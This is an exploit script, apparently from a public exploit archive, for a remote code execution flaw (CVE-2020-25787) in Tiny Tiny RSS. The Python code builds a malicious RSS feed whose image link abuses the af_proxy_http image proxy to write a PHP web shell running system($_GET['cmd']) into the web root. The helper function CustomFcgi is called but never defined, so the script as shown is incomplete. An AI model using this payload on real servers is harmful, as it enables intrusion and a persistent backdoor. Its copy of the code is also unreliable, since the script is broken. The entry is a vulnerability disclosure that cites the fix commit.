Tiny Tiny RSS - Remote Code Execution Exploit

# Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787

#!/usr/bin/env python3

from sys import argv
import base64


TTRSS_PATH = "/var/www/html/tt-rss/"
BACKDOOR_CODE = """
<?php
echo "success\n";
echo system($_GET['cmd']);
?>
"""


feed_file = open("malicious_RCE_feed.xml",'w')
filename = TTRSS_PATH + "config.php"
output = TTRSS_PATH + "backdoor.php"

backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"

feed ="""<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">

<channel>
  <title>Exploit demo - rce</title>
  <link></link>
  <description>You are getting infected :(</description>
  <item>
    <title> Check if there is backdoor.php</title>
    <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
    <description>
    <![CDATA[
        Dummy text

        <img src="{}">

    ]]>
</description>
  </item>
</channel>
</rss>
""".format(rce)

feed_file.write(feed)
feed_file.close()

#  0day.today [2021-09-13]  #